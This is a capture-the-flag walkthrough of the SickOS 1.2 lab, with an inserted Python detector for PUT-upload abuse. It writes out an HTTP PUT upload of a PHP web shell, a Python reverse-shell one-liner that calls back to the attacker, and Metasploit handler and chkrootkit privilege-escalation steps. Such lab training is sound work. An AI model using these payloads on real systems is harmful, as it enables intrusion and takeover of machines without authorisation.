SickOS 1.2

First, find the target's IP with a quick nmap range scan.

nmap -sP

Target is running on

Enumerate our target using nmap

nmap -v -sS -A -T5

Looks like only HTTP and SSH are open…

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).

Opening the target in a web browser and viewing the page source reveals:


<img src="blow.jpg">


<!-- NOTHING IN HERE ///\\\ -->>>>

Not much….

You can use nikto to gather more HTTP information.

nikto -h

Not much here either.

Now we’ll want to use DirBuster to enumerate our target’s HTTP directories.


The only directory that comes up is /test, which we browse to. Not seeing any other files or directories besides /test, we can use curl to continue our enumeration.

curl -vX OPTIONS

We now see this tidbit of information.


The server allows the HTTP PUT method on this directory, which lets you upload files into /test.

We can upload a test.txt into the /test directory using curl.

curl -vX PUT -d "Greetings Earthling"

VirtualBox issues

This is where I ran into some issues. I was getting 403 errors when trying to upload various files (php, txt, jpg, etc). I remember skimming the SickOS documentation on vulnhub and recall reading that there may be issues when running on VirtualBox.

After rebooting the target a few times, upon boot I noticed an error regarding no hdd space available - which would cause the 403 error. I converted the VMDK to VDI using the VBoxManage tool through cmd.

You’ll open cmd and get to your VirtualBox directory, then run VBoxManage and convert.

c:\Program Files\Oracle\VirtualBox>
VBoxManage clonehd --format VDI "c:\path to original sickos\sickos.vmdk" "c:\new path\sickos.vdi"

Once it’s been cloned as VDI, create a new virtual machine, then browse to and select your new .vdi. Boot it up and scan the IP range with nmap again to check whether the target’s IP has changed.

Try uploading again and you’ll see we’re back in business.

After testing a bit, we find that the target accepts multiple file types, including PHP. Knowing this, we can upload a PHP web shell with curl.

curl -X PUT -d '<?php system($_GET["cmd"]);'

Looks like the PHP file has been written. We can do a quick test by passing some shell commands in URL-encoded form.

curl ""
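From the defender's side, the upload-then-execute sequence above leaves a distinctive trail in the web server's access log. The following is an added example, not part of the original post: it flags successful PUT requests and any later request to a script that arrived by PUT. The log lines are constructed and assume a combined-style layout (client first, quoted request line, then status); `find_upload_abuse` and the extension list are hypothetical names chosen here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (documentation-range addresses), not taken from the target.
SAMPLE_LOG = """\
198.51.100.7 www - [12/Feb/2017:13:01:10 -0500] "OPTIONS /test/ HTTP/1.1" 200 0 "-" "curl/7.50"
198.51.100.7 www - [12/Feb/2017:13:02:41 -0500] "PUT /test/test.txt HTTP/1.1" 201 0 "-" "curl/7.50"
198.51.100.7 www - [12/Feb/2017:13:05:02 -0500] "PUT /test/shell.php HTTP/1.1" 201 0 "-" "curl/7.50"
198.51.100.7 www - [12/Feb/2017:13:05:30 -0500] "GET /test/shell.php?cmd=whoami HTTP/1.1" 200 54 "-" "curl/7.50"
203.0.113.20 www - [12/Feb/2017:13:06:00 -0500] "GET /index.php?page=2 HTTP/1.1" 200 163 "-" "Mozilla/5.0"
203.0.113.20 www - [12/Feb/2017:13:07:00 -0500] "PUT /test/denied.php HTTP/1.1" 403 345 "-" "curl/7.50"
"""

# Client is the first field; the request line is quoted and followed by the status.
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
# Assumed list of extensions the server might hand to an interpreter.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".cgi", ".pl", ".py")


def find_upload_abuse(log_text):
    """Return (kind, client, path, detail) tuples, in log order."""
    uploaded = {}  # path -> client that created it with a successful PUT
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        url = urlsplit(m["target"])
        path = url.path
        ok = m["status"].startswith("2")
        is_script = path.lower().endswith(SCRIPT_EXT)
        if m["method"] == "PUT" and ok:
            uploaded[path] = m["client"]
            kind = "script-upload" if is_script else "file-upload"
            findings.append((kind, m["client"], path, m["status"]))
        elif m["method"] in ("GET", "POST") and ok and is_script and path in uploaded:
            # Report only parameter names; values may hold the commands that were run.
            params = ",".join(sorted(parse_qs(url.query, keep_blank_values=True)))
            findings.append(("uploaded-script-run", m["client"], path, params))
    return findings


if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

Rejected uploads (the 403 line) are ignored, so the findings show only files that actually landed on disk.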

Getting shell

Now the idea is to get our target machine to throw us (attacker machine) a reverse shell.

On our attacker machine we’ll listen on port 443 with a reverse handler in Metasploit, then pass a Python reverse shell through our /test/shell.php in URL-encoded form.

Metasploit listener

msf > use exploit/multi/handler 
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > run

Now we’re listening for our target to throw us a reverse shell…

Python Reverse Shell

We can find the Python reverse shell script on pentestmonkey.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

Change the IP to your attacker’s IP, then run the script through a URL-encoding tool.

Once encoded, run the full command..

curl ""

and we see msf…

msf exploit(handler) > run

[*] Started reverse TCP handler on 
[*] Starting the payload handler...
[*] Command shell session 1 opened ( -> at 2017-02-12 13:24:48 -0500

/bin/sh: 0: can't access tty; job control turned off
$ whoami

Now we have shell, but not root.

Privilege Escalation

This part is probably the most time consuming. Best thing to do is just dig and enumerate as best you can. There are plenty of guides to assist in privilege escalation, and also some common exploits you can check for initially.

Eventually I found chkrootkit was being run as a daily job. Searching the msf db I found a chkrootkit exploit that fit into the version that was running.

Check to see when it’s run…

cat /var/log/syslog | grep chkrootkit

and it looks like it’s run every minute.

Now we can run the shell session in the background then search and set the chkrootkit exploit.

msf exploit(chkrootkit) > sessions

Active sessions

  Id  Type         Information                                             Connection
  --  ----         -----------                                             ----------
  2   shell linux  /bin/sh: 0: can't access tty; job control turned off $ -> (
msf exploit(chkrootkit) > set lport 8080
lport => 1337
msf exploit(chkrootkit) > set session 2
session => 2
msf exploit(chkrootkit) > set lhost
lhost =>
msf exploit(chkrootkit) > run


You should have root now…

[*] exec: whoami


Once you ls files in /root you’ll see the flag “7d03aaa2bf93d80040f3f22ec6ad9d5a.txt”
